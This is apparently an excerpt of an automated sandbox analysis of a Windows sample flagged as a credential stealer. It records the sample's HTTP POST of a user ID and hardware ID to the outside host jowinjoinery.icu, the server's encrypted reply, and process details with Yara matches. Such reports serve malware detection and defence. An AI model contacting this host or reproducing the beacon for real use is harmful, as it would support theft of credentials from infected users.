                                                            2025-03-10 20:05:28 UTC | 266 | OUT | POST /bdWUa HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 87
                                                            Host: jowinjoinery.icu
                                                            2025-03-10 20:05:28 UTC | 87 | OUT | Data Raw: 75 69 64 3d 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 26 63 69 64 3d 26 68 77 69 64 3d 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34
                                                            Data Ascii: uid=926e8c517364f11da70baa0a46e427522f26cc6d&cid=&hwid=D930444CEA5EF217E3EDCEA778368E34
                                                            2025-03-10 20:05:28 UTC | 241 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 10 Mar 2025 20:05:28 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 43
                                                            Connection: close
                                                            Server: cloudflare
                                                            Cf-Cache-Status: DYNAMIC
                                                            CF-RAY: 91e56d53ddf52039-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-03-10 20:05:28 UTC | 43 | IN | Data Raw: fb e4 fc 4e a8 6b ab 34 37 71 25 0e 1b 22 7d d6 dd 51 13 4a 87 54 32 03 a1 21 aa 0c 2c c4 ba 1f 98 3e 00 16 8f 0a 5f fd 03 18 a6
                                                            Data Ascii: Nk47q%"}QJT2!,>_



                                                            Target ID:0
                                                            Start time:16:04:40
                                                            Start date:10/03/2025
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0xad0000
                                                            File size:2'078'208 bytes
                                                            MD5 hash:5583D74A735A4C65191340FD7A465329
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1638752339.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true
